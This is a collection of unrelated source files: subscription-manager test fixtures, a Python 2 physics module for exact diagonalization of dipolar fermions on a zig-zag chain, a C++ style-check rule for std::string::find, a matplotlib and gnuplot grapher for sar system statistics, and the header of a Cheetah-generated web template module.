self.logged_exception = e def set_expected_msg(self, msg): self.expected_msg = msg def info(self, buf, *args, **kwargs): self.msg = buf def warning(self, buf, *args, **kwargs): self.msg = buf class FakeException(Exception): def __init__(self, msg=None): self.msg = msg def __str__(self): return repr(self.msg) class Matcher(object): @staticmethod def set_eq(first, second): """Useful for dealing with sets that have been cast to or instantiated as lists.""" return set(first) == set(second) def __init__(self, compare, some_obj): self.compare = compare self.some_obj = some_obj def __eq__(self, other): return self.compare(self.some_obj, other) class SubManFixture(unittest.TestCase): def set_facts(self): 
"""Override if you need to set facts for a test.""" return {"mock.facts": "true"} """ Can be extended by any subscription manager test case to make sure nothing on the actual system is read/touched, and appropriate mocks/stubs are in place. """ def setUp(self): # No matter what, stop all patching (even if we have a failure in setUp itself) self.addCleanup(patch.stopall) # Never attempt to use the actual managercli.cfg which points to a # real file in etc. self.mock_cfg_parser = stubs.StubConfig() original_conf = subscription_manager.managercli.conf def unstub_conf(): subscription_manager.managercli.conf = original_conf # Mock makes it damn near impossible to mock a module attribute (which we shouldn't be using # in the first place because it's terrible) so we monkey-patch it ourselves. # TODO Fix this idiocy by not reading the damn config on module import subscription_manager.managercli.conf = config.Config(self.mock_cfg_parser) self.addCleanup(unstub_conf) facts_host_patcher = patch('rhsmlib.dbus.facts.FactsClient', auto_spec=True) self.mock_facts_host = facts_host_patcher.start() self.mock_facts_host.return_value.GetFacts.return_value = self.set_facts() # By default mock that we are registered. Individual test cases # can override if they are testing disconnected scenario. 
id_mock = NonCallableMock(name='FixtureIdentityMock') id_mock.exists_and_valid = Mock(return_value=True) id_mock.uuid = 'fixture_identity_mock_uuid' id_mock.name = 'fixture_identity_mock_name' id_mock.cert_dir_path = "/not/a/real/path/to/pki/consumer/" id_mock.keypath.return_value = "/not/a/real/key/path" id_mock.certpath.return_value = "/not/a/real/cert/path" # Don't really care about date ranges here: self.mock_calc = NonCallableMock() self.mock_calc.calculate.return_value = None # Avoid trying to read real /etc/yum.repos.d/redhat.repo self.mock_repofile_path_exists_patcher = patch('subscription_manager.repolib.YumRepoFile.path_exists') mock_repofile_path_exists = self.mock_repofile_path_exists_patcher.start() mock_repofile_path_exists.return_value = True inj.provide(inj.IDENTITY, id_mock) inj.provide(inj.PRODUCT_DATE_RANGE_CALCULATOR, self.mock_calc) inj.provide(inj.ENTITLEMENT_STATUS_CACHE, stubs.StubEntitlementStatusCache()) inj.provide(inj.POOL_STATUS_CACHE, stubs.StubPoolStatusCache()) inj.provide(inj.PROD_STATUS_CACHE, stubs.StubProductStatusCache()) inj.provide(inj.CONTENT_ACCESS_MODE_CACHE, stubs.StubContentAccessModeCache()) inj.provide(inj.SUPPORTED_RESOURCES_CACHE, stubs.StubSupportedResourcesCache()) inj.provide(inj.SYSPURPOSE_VALID_FIELDS_CACHE, stubs.StubSyspurposeValidFieldsCache()) inj.provide(inj.CURRENT_OWNER_CACHE, stubs.StubCurrentOwnerCache) inj.provide(inj.OVERRIDE_STATUS_CACHE, stubs.StubOverrideStatusCache()) inj.provide(inj.RELEASE_STATUS_CACHE, stubs.StubReleaseStatusCache()) inj.provide(inj.AVAILABLE_ENTITLEMENT_CACHE, stubs.StubAvailableEntitlementsCache()) inj.provide(inj.PROFILE_MANAGER, stubs.StubProfileManager()) # By default set up an empty stub entitlement and product dir. # Tests need to modify or create their own but nothing should hit # the system. 
self.ent_dir = stubs.StubEntitlementDirectory() inj.provide(inj.ENT_DIR, self.ent_dir) self.prod_dir = stubs.StubProductDirectory() inj.provide(inj.PROD_DIR, self.prod_dir) # Installed products manager needs PROD_DIR injected first inj.provide(inj.INSTALLED_PRODUCTS_MANAGER, stubs.StubInstalledProductsManager()) self.stub_cp_provider = stubs.StubCPProvider() self._release_versions = [] self.stub_cp_provider.content_connection.get_versions = self._get_release_versions inj.provide(inj.CP_PROVIDER, self.stub_cp_provider) inj.provide(inj.CERT_SORTER, stubs.StubCertSorter()) # setup and mock the plugin_manager plugin_manager_mock = MagicMock(name='FixturePluginManagerMock') plugin_manager_mock.runiter.return_value = iter([]) inj.provide(inj.PLUGIN_MANAGER, plugin_manager_mock) inj.provide(inj.DBUS_IFACE, Mock(name='FixtureDbusIfaceMock')) pooltype_cache = Mock() inj.provide(inj.POOLTYPE_CACHE, pooltype_cache) # don't use file based locks for tests inj.provide(inj.ACTION_LOCK, RLock) self.stub_facts = stubs.StubFacts() inj.provide(inj.FACTS, self.stub_facts) content_access_cache_mock = MagicMock(name='ContentAccessCacheMock') inj.provide(inj.CONTENT_ACCESS_CACHE, content_access_cache_mock) self.dbus_patcher = patch('subscription_manager.managercli.CliCommand._request_validity_check') self.dbus_patcher.start() # No tests should be trying to connect to any configure or test server # so really, everything needs this mock. May need to be in __init__, or # better, all test classes need to use SubManFixture self.is_valid_server_patcher = patch("subscription_manager.managercli.is_valid_server_info") is_valid_server_mock = self.is_valid_server_patcher.start() is_valid_server_mock.return_value = True # No tests should be trying to test the proxy connection # so really, everything needs this mock. 
May need to be in __init__, or # better, all test classes need to use SubManFixture self.test_proxy_connection_patcher = patch("subscription_manager.managercli.CliCommand.test_proxy_connection") test_proxy_connection_mock = self.test_proxy_connection_patcher.start() test_proxy_connection_mock.return_value = True self.syncedstore_patcher = patch('subscription_manager.syspurposelib.SyncedStore') syncedstore_mock = self.syncedstore_patcher.start() set_up_mock_sp_store(syncedstore_mock) self.files_to_cleanup = [] def tearDown(self): if not hasattr(self, 'files_to_cleanup'): return for f in self.files_to_cleanup: # Assuming these are tempfile.NamedTemporaryFile, created with # the write_tempfile() method in this class. f.close() def write_tempfile(self, contents): """ Write out a tempfile and append it to the list of those to be cleaned up in tearDown. """ fid = tempfile.NamedTemporaryFile(mode='w+', suffix='.tmp') fid.write(contents) fid.seek(0) self.files_to_cleanup.append(fid) return fid def set_consumer_auth_cp(self, consumer_auth_cp): cp_provider = inj.require(inj.CP_PROVIDER) cp_provider.consumer_auth_cp = consumer_auth_cp def get_consumer_cp(self): cp_provider = inj.require(inj.CP_PROVIDER) consumer_cp = cp_provider.get_consumer_auth_cp() return consumer_cp # The ContentConnection used for reading release versions from # the cdn. The injected one uses this. def _get_release_versions(self, listing_path): return self._release_versions # For changing injection consumer id to one that fails "is_valid" def _inject_mock_valid_consumer(self, uuid=None): """For changing injected consumer identity to one that passes is_valid() Returns the injected identity if it need to be examined. 
""" identity = NonCallableMock(name='ValidIdentityMock') identity.uuid = uuid or "VALIDCONSUMERUUID" identity.is_valid = Mock(return_value=True) identity.cert_dir_path = "/not/a/real/path/to/pki/consumer/" inj.provide(inj.IDENTITY, identity) return identity def _inject_mock_invalid_consumer(self, uuid=None): """For chaining injected consumer identity to one that fails is_valid() Returns the injected identity if it need to be examined. """ invalid_identity = NonCallableMock(name='InvalidIdentityMock') invalid_identity.is_valid = Mock(return_value=False) invalid_identity.uuid = uuid or "INVALIDCONSUMERUUID" invalid_identity.cert_dir_path = "/not/a/real/path/to/pki/consumer/" inj.provide(inj.IDENTITY, invalid_identity) return invalid_identity # use our naming convention here to make it clear # this is our extension. Note that python 2.7 adds a # assertMultilineEquals that assertEqual of strings does # automatically def assert_string_equals(self, expected_str, actual_str, msg=None): if expected_str != actual_str: expected_lines = expected_str.splitlines(True) actual_lines = actual_str.splitlines(True) delta = difflib.unified_diff(expected_lines, actual_lines, "expected", "actual") message = ''.join(delta) if msg: message += " : " + msg self.fail("Multi-line strings are unequal:\n" + message) def assert_equal_dict(self, expected_dict, actual_dict): mismatches = [] missing_keys = [] extra = [] for key in expected_dict: if key not in actual_dict: missing_keys.append(key) continue if expected_dict[key] != actual_dict[key]: mismatches.append((key, expected_dict[key], actual_dict[key])) for key in actual_dict: if key not in expected_dict: extra.append(key) message = "" if missing_keys or extra: message += "Keys in only one dict: \n" if missing_keys: for key in missing_keys: message += "actual_dict: %s\n" % key if extra: for key in extra: message += "expected_dict: %s\n" % key if mismatches: message += "Unequal values: \n" for info in mismatches: message += "%s: %s != %s\n" % 
info # pprint the dicts message += "\n" message += "expected_dict:\n" message += pprint.pformat(expected_dict) message += "\n" message += "actual_dict:\n" message += pprint.pformat(actual_dict) if mismatches or missing_keys or extra: self.fail(message) def assert_items_equals(self, a, b): """Assert that two lists contain the same items regardless of order.""" if sorted(a, key=lambda item: str(item)) != sorted(b, key=lambda item: str(item)): self.fail("%s != %s" % (a, b)) return True class Capture(object): class Tee(object): def __init__(self, stream, silent): self.buf = six.StringIO() self.stream = stream self.silent = silent def write(self, data): self.buf.write(data) if not self.silent: self.stream.write(data) def flush(self): pass def getvalue(self): return self.buf.getvalue() def isatty(self): return False def __init__(self, silent=False): self.silent = silent def __enter__(self): self.buffs = (self.Tee(sys.stdout, self.silent), self.Tee(sys.stderr, self.silent)) self.stdout = sys.stdout self.stderr = sys.stderr sys.stdout, sys.stderr = self.buffs return self @property def out(self): return self.buffs[0].getvalue() @property def err(self): return self.buffs[1].getvalue() def __exit__(self, exc_type, exc_value, traceback): sys.stdout = self.stdout sys.stderr = self.stderr def set_up_mock_sp_store(mock_sp_store): """ Sets up the mock syspurpose store with methods that are mock versions of the real deal. Allows us to test in the absence of the syspurpose module. This documents the essential expected behaviour of the methods subman relies upon from the syspurpose codebase. 
:return: """ contents = {} mock_sp_store_contents = contents def set(item, value): contents[item] = value def read(path, raise_on_error=False): return mock_sp_store def unset(item): contents[item] = None def add(item, value): current = contents.get(item, []) if value not in current: current.append(value) contents[item] = current def remove(item, value): current = contents.get(item) if current is not None and isinstance(current, list) and value in current: current.remove(value) def get_local_contents(): return contents def get_cached_contents(): return contents def update_local(data): global contents contents = data mock_sp_store.return_value.set = Mock(side_effect=set) mock_sp_store.return_value.read = Mock(side_effect=read) mock_sp_store.return_value.unset = Mock(side_effect=unset) mock_sp_store.return_value.add = Mock(side_effect=add) mock_sp_store.return_value.remove = Mock(side_effect=remove) mock_sp_store.return_value.local_contents = mock_sp_store_contents mock_sp_store.return_value.get_local_contents = Mock(side_effect=get_local_contents) mock_sp_store.return_value.update_local = Mock(side_effect=update_local) mock_sp_store.return_value.get_cached_contents = Mock(side_effect=get_cached_contents) return mock_sp_store, mock_sp_store_contents
jotterbach/ExactDiagonalization_PolarizedFermionicDipolesOnZigZagChain
DiagonalizationMethods.py
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 26 11:09:05 2013

@author: jotterbach
"""

from numpy import *
from ED_HalfFilling import EigSys_HalfFilling
from DotProduct import scalar_prod
from multiprocessing import *
from multiprocessing import Pool
import matplotlib.pyplot as plt
from ParallelizationTools import info
from os.path import *
from scipy.special import *
from scipy.linalg import qr
# NOTE(review): duplicate import - scalar_prod is already imported above.
from DotProduct import scalar_prod
from Correlation_Generator import *
from datetime import datetime

''' define the datestamp for the filenames '''
date = str(datetime.now())
now = date[0:10]+'_'+date[11:13]+'h'+date[14:16]+'m'


def AngleSpectrum(number_particles, noEV, gamma, hopping, angle):
    """ AngleSpectrum(number_particles, noEV, gamma, hopping, angle):
    computes the energy eigenspectrum as a function of the angle of the
    dipoles with the chain axis given an unit interaction V and a hopping J

    parameters of the function:
    number_particles: number of particles in the problem
    noEV: number of eigenvalues being calculated
    gamma: opening angle of the zig-zag chain
    hopping: hopping parameter in units of interaction V
    angle: array containing the angles as a multiple of **PI**
    """

    ''' default values for other methods that are being called by the
    current function '''
    spectrum = 1 #ensures that the spectrum is calculated in EigSys_HalfFilling
    independet_v1_v2 = 1 #makes v1 and v2 independent of each other
    number_sites = 2*number_particles #condition for half-filling
    interaction_strength = 1 #unit of energy
#    number_particles = 6
#    noEV = 5*number_sites #degeneracy of GS requires noEV>number_sites
#    hopping = .1
#    gamma = 2*pi/3
#    angle = linspace(-.8,-.7,41)

    ''' intialization of variables that will be stored for later use '''
    eigval = zeros((angle.shape[0],noEV), dtype = float)
    degeneracies = zeros((angle.shape[0],1))
    v1 = zeros((angle.shape[0],1))
    v2 = zeros((angle.shape[0],1))
    v3 = zeros((angle.shape[0],1))

    ''' actual method call '''
    # NOTE(review): the guard compares __name__ to this *module's* name, so
    # the diagonalization only runs when the function is called from another
    # module that imported DiagonalizationMethods (protects the
    # multiprocessing Pool from re-spawning on worker import).
    if __name__ == 'DiagonalizationMethods':
        info('main line')
        pool = Pool()

        ''' invocation of the eigenvalue procedure '''
        # One async diagonalization per angle; results arrive out of order,
        # so each result is matched back via the angle it carries (index 0).
        it = [pool.apply_async(EigSys_HalfFilling, (number_particles,
              number_sites, hopping, interaction_strength, angle[angle_idx],
              noEV, spectrum, gamma, independet_v1_v2))
              for angle_idx in range(0,angle.shape[0])]
        for ridx in it:
            angle_idx = nonzero(angle == ridx.get()[0])
            eigval[angle_idx,:]= ridx.get()[1]#floor(10*around(real(ridx.get()[1]),decimals = 2))/10
            # Ground-state degeneracy = multiplicity of the lowest eigenvalue.
            degeneracies[angle_idx] = sum((eigval[angle_idx,:] == eigval[angle_idx,0]).astype(int))
            v1[angle_idx]=ridx.get()[2]
            v2[angle_idx]=ridx.get()[3]
            v3[angle_idx]=ridx.get()[4]
            print 'angle:', angle[angle_idx], '\nground-state degeneracy:', degeneracies[angle_idx]

        filename = 'FigureData/'+now+'_AngleSpectrum_N'+str(number_particles)+'_J'+str(hopping).replace('.','-')+'_vdd'+str(interaction_strength).replace('.','-')
        save(filename+'_EigVals', eigval)
        save(filename+'_angle', angle)
        print 'saved: '+filename


def InteractionSpectrum(number_particles, noEV, gamma, angle, interaction_strength):
    ''' computes the eigenvalue spectrum for a given angle as a function of
    the interaction strength in units of J

    parameters of the function:
    number_particles: number of particles in the problem
    noEV: number of eigenvalues being calculated
    gamma: opening angle of the zig-zag chain
    angle: array containing the angles as a multiple of **PI**
    interaction_strength: interaction in units of hopping J
    '''

    ''' default values for other methods that are being called by the
    current function '''
    spectrum = 1 #ensures that the spectrum is calculated in EigSys_HalfFilling
    independent_v1_v2 = 1 #makes v1 and v2 independent of each other
    number_sites = 2*number_particles #condition for half-filling
    hopping = 1 #unit of energy

    ''' intialization of variables that will be stored for later use '''
    eigval = zeros((len(interaction_strength),noEV), dtype = float)
    v1 = zeros((interaction_strength.shape[0],1))
    v2 = zeros((interaction_strength.shape[0],1))
    v3 = zeros((interaction_strength.shape[0],1))

    ''' actual method call '''
    if __name__ == 'DiagonalizationMethods':
        info('main line')
        pool = Pool()

        ''' invocation of eigenvalue procedure '''
        # Results matched back by the interaction strength echoed at index 6.
        it = [pool.apply_async(EigSys_HalfFilling, (number_particles,
              number_sites, hopping, interaction_strength[idx], angle, noEV,
              spectrum, gamma, independent_v1_v2))
              for idx in range(len(interaction_strength))]
        for ridx in it:
            idx = nonzero(interaction_strength == ridx.get()[6])
            v1=ridx.get()[2]
            v2=ridx.get()[3]
            v3=ridx.get()[4]
            eigval[idx,:]= ridx.get()[1]#floor(10*around(real(ridx.get()[1]),decimals = 2))/10
            print 'interaction:', interaction_strength[idx], 'interaction constants: ', v1,v2,v3

        filename = 'FigureData/'+now+'_InteractionSpectrum_N'+str(number_particles)+'_J'+str(hopping).replace('.','-')+'_Theta'+str(angle).replace('.','-')
        save(filename+'_EigVals', eigval)
        save(filename+'_interaction',interaction_strength)
        print 'saved: '+filename


def HoppingSpectrum(number_particles, noEV, gamma, angle, hopping):
    ''' computes the eigenvalue spectrum for given interactions as a function
    of the hopping in units of interaction V

    parameters of the function:
    number_particles: number of particles in the problem
    noEV: number of eigenvalues being calculated
    gamma: opening angle of the zig-zag chain
    angle: array containing the angles as a multiple of **PI**
    hopping: hopping in units of interaction V
    '''

    ''' default values for other methods that are being called by the
    current function '''
    spectrum = 1 #ensures that the spectrum is calculated in EigSys_HalfFilling
    independent_v1_v2 = 1 #makes v1 and v2 independent of each other
    number_sites = 2*number_particles #condition for half-filling
    interaction_strength = 1 #unit of energy

    ''' intialization of variables that will be stored for later use '''
    eigval = zeros((len(hopping),noEV), dtype = float)
    v1 = zeros((hopping.shape[0],1))
    v2 = zeros((hopping.shape[0],1))
    v3 = zeros((hopping.shape[0],1))

    ''' actual method call '''
    if __name__ == 'DiagonalizationMethods':
        info('main line')
        pool = Pool()

        ''' invocation of eigenvalue procedure '''
        # Results matched back by the hopping value echoed at index 5.
        it = [pool.apply_async(EigSys_HalfFilling, (number_particles,
              number_sites, hopping[idx], interaction_strength, angle, noEV,
              spectrum, gamma, independent_v1_v2))
              for idx in range(len(hopping))]
        for ridx in it:
            idx = nonzero(hopping == ridx.get()[5])
            v1=ridx.get()[2]
            v2=ridx.get()[3]
            v3=ridx.get()[4]
            eigval[idx,:]= ridx.get()[1]
            print 'hopping:', hopping[idx], 'interactions: ', v1,v2,v3

        filename = 'FigureData/'+now+'_HoppingSpectrum-nnhopping_N'+str(number_particles)+'_vdd'+str(interaction_strength).replace('.','-')+'_Theta'+str(angle).replace('.','-')
        save(filename+'_EigVals', eigval)
        save(filename+'_hopping', hopping)
        print 'saved: '+filename


def DensityCorrelations(number_particles, noEV, gamma, angle, hopping, degeneracy):
    ''' computes the density correlation function for a given set of angle,
    interaction and hopping'''

    ''' default values for other methods that are being called by the
    current function '''
    spectrum = 0 #ensures that the spectrum AND the eigenvectors are calculated in EigSys_HalfFilling
    independent_v1_v2 = 1 #makes v1 and v2 independent of each other
    number_sites = 2*number_particles #condition for half-filling
    interaction_strength = 1 #unit of energy

    ''' function specific parameter initilaization '''
    eigval, eigvec, basisstates = EigSys_HalfFilling(number_particles, number_sites, hopping, interaction_strength, angle, noEV, spectrum, gamma, independent_v1_v2)
    eigval = around(real(eigval),decimals = 2)
    print '\nlow-energy spectrum: \n', eigval
    print 'GS degeneracy:', degeneracy
    eigvec = eigvec.astype(complex)
    if degeneracy > 1:
        # Orthonormalize the (possibly non-orthogonal) degenerate ground-state
        # manifold via a QR decomposition before computing observables.
        print '\nOrthogonalizing GS manifold'
        eigvec_GS = zeros((eigvec.shape[0],degeneracy), dtype = complex)
        for m in range(degeneracy):
            eigvec_GS[:,m] = eigvec[:,m]
        Q, R = qr(eigvec_GS, mode = 'economic')
        for m in range(degeneracy):
            eigvec[:,m] = Q[:,m]
        del Q, R, eigvec_GS
    number_states = basisstates.shape[0]

    if __name__ == 'DiagonalizationMethods':
        ''' local density '''
        # Average <n_i> over the (orthonormalized) ground-state manifold.
        print '\nCalculating local density'
        local_density = zeros((2*number_particles,1), dtype = float)
        pool = Pool()
        for deg_idx in range(0,degeneracy):
            print 'state index: ', deg_idx
            it = [pool.apply_async(loc_den, (basisstates, number_particles, number_states, eigvec[:,deg_idx], site_idx)) for site_idx in range(0,2*number_particles)]
            for ridx in it:
                site_idx = ridx.get()[0]
                local_density[site_idx] += real(ridx.get()[1])/degeneracy

        ''' density-density correlation '''
        # Pair correlation g2(site) averaged over the ground-state manifold.
        print '\nCalculating density-density correlations'
        g2 = zeros((number_sites,1), dtype = float)
        for deg_idx in range(0,degeneracy):
            print 'state index: ', deg_idx
            it = [pool.apply_async(pair_corr, (basisstates, number_particles, number_sites, number_states, eigvec[:,deg_idx], site_idx)) for site_idx in range(0,number_sites)]
            for ridx in it:
                site_idx = ridx.get()[0]
                g2[site_idx] += real(ridx.get()[1])/degeneracy

        filename='FigureData/'+now+'_Correlations_N'+str(number_particles)+'_J'+str(hopping).replace('.','-')+'_vdd'+str(interaction_strength).replace('.','-')+'_Theta'+str(angle).replace('.','-')
        save(filename+'_local_density', local_density)
        save(filename+'_g2', g2)
        print 'saved: '+filename
widelands/widelands
cmake/codecheck/rules/contrived_std_string_find.py
#!/usr/bin/python """Do not call std::string::find_first_of or std::string::find with a string of characters to locate that has the size 1. Use the version of std::string::find that takes a single character to locate instead. Same for find_last_of/rfind. """ error_msg = "Do not use find(\"a\"), use find('a')." regexp = r"""(?x) r?find(_(first|last)_of)?\s* \( "([^\\]|(\\[nt\\"]))"[,)]""" forbidden = [ r'find_first_of("a")', r'find_last_of("a")', r'find("a")', r'rfind("a")', r'find_first_of("\n")', r'find_last_of("\n")', r'find("\n")', r'rfind("\n")', r'find_first_of("\t")', r'find_last_of("\t")', r'find("\t")', r'rfind("\t")', r'find_first_of("\\")', r'find_last_of("\\")', r'find("\\")', r'rfind("\\")', r'find_first_of("\"")', r'find_last_of("\"")', r'find("\"")', r'rfind("\"")', r'find_first_of("a", 1)', r'find_last_of("a", 1)', r'find("a", 1)', r'rfind("a", 1)', ] allowed = [ r'find("ab")', r"find('a')", r"rfind('a')", r'rfind("ab")', r"find('\n')", r'find("\nx")', r"rfind('\n')", r'rfind("\nx")', r"find('\t')", r'find("\tx")', r"rfind('\t')", r'rfind("\tx")', r"find('\\')", r'find("\\x")', r"rfind('\\')", r'rfind("\\x")', r"find('\"')", r'find("\"x")', r"rfind('\"')", r'rfind("\"x")', r"find('a', 1)", r'find("ab", 1)', r"rfind('a', 1)", r'rfind("ab", 1)', ]
mbaldessari/sarstats
sar_grapher.py
import hashlib
import matplotlib
# Force matplotlib to not use any Xwindows backend.
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import matplotlib.colors as colors
import matplotlib.cm as cm
from matplotlib.patches import Rectangle
import os
import shutil
import tempfile

from sar_parser import SarParser

# If the there are more than 50 plots in a graph we move the legend to the
# bottom
LEGEND_THRESHOLD = 50


def ascii_date(d):
    """Format a datetime the way the embedded gnuplot script expects it."""
    return "%s" % (d.strftime("%Y-%m-%d %H:%M"))


class SarGrapher(object):
    """Renders graphs (PNG/SVG/ASCII) from parsed sar data."""

    def __init__(self, filenames, starttime=None, endtime=None):
        """Initializes the class, creates a SarParser class
        given a list of files and also parsers the files"""
        # Temporary dir where images are stored (one per graph)
        # NB: This is done to keep the memory usage constant
        # in spite of being a bit slower (before this change
        # we could use > 12GB RAM for a simple sar file -
        # matplotlib is simply inefficient in this area)
        self._tempdir = tempfile.mkdtemp(prefix='sargrapher')

        self.sar_parser = SarParser(filenames, starttime, endtime)
        self.sar_parser.parse()
        duplicate_timestamps = self.sar_parser._duplicate_timestamps
        if duplicate_timestamps:
            # Fixed: the two literals used to concatenate to "10line".
            print("There are {0} lines with duplicate timestamps. First 10 "
                  "line numbers at {1}".format(
                      len(duplicate_timestamps.keys()),
                      sorted(list(duplicate_timestamps.keys()))[:10]))

    def _graph_filename(self, graph, extension='.png'):
        """Creates a unique constant file name given a graph or graph list"""
        if isinstance(graph, list):
            temp = "_".join(graph)
        else:
            temp = graph
        temp = temp.replace('%', '_')
        temp = temp.replace('/', '_')
        digest = hashlib.sha1()
        digest.update(temp.encode('utf-8'))
        fname = os.path.join(self._tempdir, digest.hexdigest() + extension)
        return fname

    def datasets(self):
        """Returns a list of all the available datasets"""
        return self.sar_parser.available_data_types()

    def timestamps(self):
        """Returns a sorted list of all the available timestamps"""
        return sorted(self.sar_parser.available_timestamps())

    def plot_datasets(self, data, fname, extra_labels, showreboots=False,
                      output='pdf'):
        """ Plot timeseries data (of type dataname).  The data can be either
        simple (one or no datapoint at any point in time, or indexed (by
        indextype). dataname is assumed to be in the form of [title, [label1,
        label2, ...], [data1, data2, ...]] extra_labels is a list of tuples
        [(datetime, 'label'), ...] """
        sar_parser = self.sar_parser
        title = data[0][0]
        unit = data[0][1]
        axis_labels = data[0][2]
        datanames = data[1]

        if not isinstance(datanames, list):
            raise Exception("plottimeseries expects a list of datanames: %s" %
                            data)

        fig = plt.figure(figsize=(10.5, 6.5))
        axes = fig.add_subplot(111)
        axes.set_title('{0} time series'.format(title), fontsize=12)
        axes.set_xlabel('Time')
        axes.xaxis.set_major_formatter(mdates.DateFormatter('%m-%d %H:%M'))
        # Twenty minutes. Could probably make it a parameter
        axes.xaxis.set_minor_locator(mdates.MinuteLocator(interval=20))
        fig.autofmt_xdate()

        ylabel = title
        if unit:
            ylabel += " - " + unit
        axes.set_ylabel(ylabel)

        y_formatter = matplotlib.ticker.ScalarFormatter(useOffset=False)
        axes.yaxis.set_major_formatter(y_formatter)
        axes.yaxis.get_major_formatter().set_scientific(False)

        color_norm = colors.Normalize(vmin=0, vmax=len(datanames) - 1)
        scalar_map = cm.ScalarMappable(norm=color_norm,
                                       cmap=plt.get_cmap('Set1'))

        timestamps = self.timestamps()
        counter = 0
        for i in datanames:
            try:
                dataset = [sar_parser._data[d][i] for d in timestamps]
            except Exception:  # narrowed from a bare except; still re-raised
                print("Key {0} does not exist in this graph".format(i))
                raise
            axes.plot(timestamps, dataset, 'o:', label=axis_labels[counter],
                      color=scalar_map.to_rgba(counter))
            counter += 1

        # Draw extra_labels
        if extra_labels:
            for extra in extra_labels:
                axes.annotate(extra[1], xy=(mdates.date2num(extra[0]),
                              sar_parser.find_max(extra[0], datanames)),
                              xycoords='data', xytext=(30, 30),
                              textcoords='offset points',
                              arrowprops=dict(arrowstyle="->",
                                              connectionstyle="arc3,rad=.2"))

        # If we have a sosreport draw the reboots
        if showreboots and sar_parser.sosreport is not None and \
                sar_parser.sosreport.reboots is not None:
            reboots = sar_parser.sosreport.reboots
            for reboot in reboots.keys():
                reboot_date = reboots[reboot]['date']
                rboot_x = mdates.date2num(reboot_date)
                (xmin, xmax) = plt.xlim()
                (ymin, ymax) = plt.ylim()
                if rboot_x < xmin or rboot_x > xmax:
                    continue

                axes.annotate('', xy=(mdates.date2num(reboot_date), ymin),
                              xycoords='data', xytext=(-30, -30),
                              textcoords='offset points',
                              arrowprops=dict(arrowstyle="->", color='blue',
                                              connectionstyle="arc3,rad=-0.1"))

        # Show any data collection gaps in the graph
        gaps = sar_parser.find_data_gaps()
        if len(gaps) > 0:
            for i in gaps:
                (g1, g2) = i
                x1 = mdates.date2num(g1)
                x2 = mdates.date2num(g2)
                (ymin, ymax) = plt.ylim()
                axes.add_patch(Rectangle((x1, ymin), x2 - x1, ymax - ymin,
                                         facecolor="lightgrey"))

        # Add a grid to the graph to ease visualization
        axes.grid(True)

        lgd = None
        # Draw the legend only when needed
        if len(datanames) > 1 or \
                (len(datanames) == 1 and len(datanames[0].split('#')) > 1):
            # We want the legends box roughly square shaped
            # and not take up too much room
            props = matplotlib.font_manager.FontProperties(size='xx-small')
            if len(datanames) < LEGEND_THRESHOLD:
                cols = int((len(datanames) ** 0.5))
                lgd = axes.legend(loc=1, ncol=cols, shadow=True, prop=props)
            else:
                cols = int(len(datanames) ** 0.6)
                lgd = axes.legend(loc=9, ncol=cols,
                                  bbox_to_anchor=(0.5, -0.29),
                                  shadow=True, prop=props)

        if len(datanames) == 0:
            return None

        try:
            if lgd:
                plt.savefig(fname, bbox_extra_artists=(lgd,),
                            bbox_inches='tight')
            else:
                plt.savefig(fname, bbox_inches='tight')
        except Exception:  # narrowed from a bare except
            import traceback
            print(traceback.format_exc())
            import sys
            sys.exit(-1)

        plt.cla()
        plt.clf()
        plt.close('all')

    def plot_svg(self, graphs, output, labels):
        """Given a list of graphs, output an svg file per graph.
        Input is a list of strings. A graph with multiple datasets
        is a string with datasets separated by comma"""
        if output == 'out.pdf':
            output = 'graph'
        counter = 1
        fnames = []
        for i in graphs:
            subgraphs = i.split(',')
            fname = self._graph_filename(subgraphs, '.svg')
            fnames.append(fname)
            self.plot_datasets((['', None, subgraphs], subgraphs), fname,
                               labels)
            dest = os.path.join(os.getcwd(), "{0}{1}.svg".format(
                output, counter))
            shutil.move(fname, dest)
            print("Created: {0}".format(dest))
            counter += 1

        # removes all temporary files and directories
        self.close()

    def plot_ascii(self, graphs, def_columns=80, def_rows=25):
        """Displays a single graph in ASCII form on the terminal"""
        import subprocess
        sar_parser = self.sar_parser
        timestamps = self.timestamps()
        try:
            # `stty size` prints "<rows> <columns>" as *strings*; convert to
            # int so the comparison below is meaningful (it was comparing a
            # str against an int before).
            rows, columns = [int(v) for v in
                             os.popen('stty size', 'r').read().split()]
        except Exception:
            columns = def_columns
            rows = def_rows
        if columns > def_columns:
            columns = def_columns

        for graph in graphs:
            try:
                # universal_newlines=True so we can write str (not bytes)
                # to gnuplot's stdin on Python 3 as well.
                gnuplot = subprocess.Popen(["/usr/bin/gnuplot"],
                                           stdin=subprocess.PIPE,
                                           universal_newlines=True)
            except Exception as e:
                # Was `raise("...")`, which raises a TypeError because a str
                # is not an exception; raise a real exception instead.
                raise RuntimeError("Error launching gnuplot: {0}".format(e))

            gnuplot.stdin.write("set term dumb {0} {1}\n".format(
                columns, rows))
            gnuplot.stdin.write("set xdata time\n")
            gnuplot.stdin.write('set xlabel "Time"\n')
            gnuplot.stdin.write('set timefmt \"%Y-%m-%d %H:%M\"\n')
            gnuplot.stdin.write('set xrange [\"%s\":\"%s\"]\n' %
                                (ascii_date(timestamps[0]),
                                 ascii_date(timestamps[-1])))
            gnuplot.stdin.write('set ylabel "%s"\n' % (graph))
            gnuplot.stdin.write('set datafile separator ","\n')
            gnuplot.stdin.write('set autoscale y\n')
            gnuplot.stdin.write('set title "%s - %s"\n' %
                                (graph, " ".join(sar_parser._files)))
            # FIXME: do it through a method
            try:
                dataset = [sar_parser._data[d][graph] for d in timestamps]
            except KeyError:
                # The format placeholder was never filled in before.
                print("Key '{0}' could not be found".format(graph))
                return

            txt = "plot '-' using 1:2 title '{0}' with linespoints \n".format(
                graph)
            gnuplot.stdin.write(txt)
            for i, j in zip(timestamps, dataset):
                s = '\"%s\",%f\n' % (ascii_date(i), j)
                gnuplot.stdin.write(s)
            gnuplot.stdin.write("e\n")
            gnuplot.stdin.write("exit\n")
            gnuplot.stdin.flush()

    def export_csv(self):
        return

    def close(self):
        """Removes temporary directory and files"""
        if os.path.isdir(self._tempdir):
            shutil.rmtree(self._tempdir)
MOA-2011/enigma2-plugin-extensions-openwebif
plugin/controllers/views/web/gettags.py
#!/usr/bin/env python

# NOTE: This module is machine-generated by Cheetah from gettags.tmpl.
# Do not hand-edit; regenerate from the template instead.

##################################################
## DEPENDENCIES
import sys
import os
import os.path
try:
    import builtins as builtin
except ImportError:
    import __builtin__ as builtin
